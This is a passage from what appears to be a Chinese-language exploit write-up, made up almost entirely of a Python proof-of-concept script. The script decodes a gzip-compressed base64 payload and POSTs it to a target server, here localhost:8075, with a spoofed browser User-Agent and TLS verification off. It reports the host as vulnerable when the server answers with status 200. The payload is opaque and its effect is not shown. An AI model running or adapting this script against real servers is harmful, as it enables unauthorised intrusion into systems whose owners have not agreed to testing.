IY/DghVotReEE4VBU2FF8GE41dZragjoRKvg+0Gc5Mu3hK3UDuPf5rDTbFdqMPagEJoUu52Gjdbp0koUll3RWQ3HoyAqVyfmaYpBfViRrRoV6tJllQfCAzVOA/kuD7y8zoUVEhuIxlnqOCWKCdQISfhgYpCqZtBAlg0znDdmmxDwJOBtlnzwtAf7oMhkg0q7BdcEkmv3Qo8sklumoYnEEw9UoWW03/ijNq3FOjJI3O9HkjbINJwoXNfh0M2XBa1gJG3CS8VXfTHWlASRRo2hxC24EKaiEMbEUQhlAIrY+Kc2Nz56MWH4LkROhIaulXE1UzcMaK3LW1rrubaYaKqm+qtYVb0UtODQhh8hUT9Omp4WgL5Dg/9tavrei3iZ1fUePPDd/V7iUSsfW7+awNvWMKefzq+8HfMJzujvd+60Y5tKIa4vyIn4sivOCWmVudINzcHSwmtPPfWrlb/p+zM8P2xYcdq0FqNFQNDXaxceluPoNFfBgajs8+f+UvzMz3r0deHphyaBuG8eefXl700sflbjfnQT3OhwBX4NYPMCLhRiF9psAdpng6fn/tSB93/b1WYBWhcfgtbMujrPJImd/8MPfvxGhX8XBcJbRAJWORCTyllABUI9vAlde5Wlzv/zr/earh6JunokVcB9sq0YOq+n49ufgz//zw/Xych+0CFPtkMUB6jDgELGipeeDiolJj73+lcP97z89hfr0ikJMcqvfOCRIMOxrHFHdWXoN897Fz/+ioqtrrBPUKiHqvhJWi6cQbQk6eMDXiOnlqEgfTFn7G7KK/dTNz4pD2xDWkg39eXZb18crnrwNCF7ErrZ5OGci+V0GfoLq5TGIqi7DK9F18n3FWqj9YZBF6qB/FvbX/xUuPF2gAD+6BlJLm229TYmPh7a7Vyrc1rlP7l1XIX9wtVXftQ98/T/zuvtoUPL25RKlnu1GVdV+fiS/dPffGvq+196oF2iwxtsr2w8pu09Bl0JGzMWIM37xgr1IYAMvFXCHwh8Aw97Rug+Az+mk0qlLt/Twxt6qtnPydGD2c3iuAFx+mjD8J07GEGSvIA16ugx/aMIlCT8VSSnLyWwKWNVmbZ4gfPVwDt24rhjUW/MMM6eu5Q+A39nx86ev3zFmGCgJyCA54wp22VzzIOOLw+1zueugZcncFo2YBe5R09TOB85ZgD9NBfHT46TDZ42ZSN+UonPD/Kkmu3V8Gxq2aqHGW0wTkrhYWDoj9/6zr/vv3Q5GWGIOYbsFI2O1h+DELzTU+us6v8BnkMlL/YaAAA="
## b = b"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"
data = base64.b64decode(b)

headers["Content-Length"] = str(len(data))
headers["User-Agent"] = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36"
res = requests.post(url=url, headers=headers, data=data, verify=False, timeout=10)
if res.status_code == 200:
print("[+]", host, "------存在漏洞!")
## print("[+]", res.text)

except Exception as e:
print("[o]", host, "------不存在漏洞!")
print(e)

if __name__ == "__main__":
cmd("http://localhost:8075")

参考链接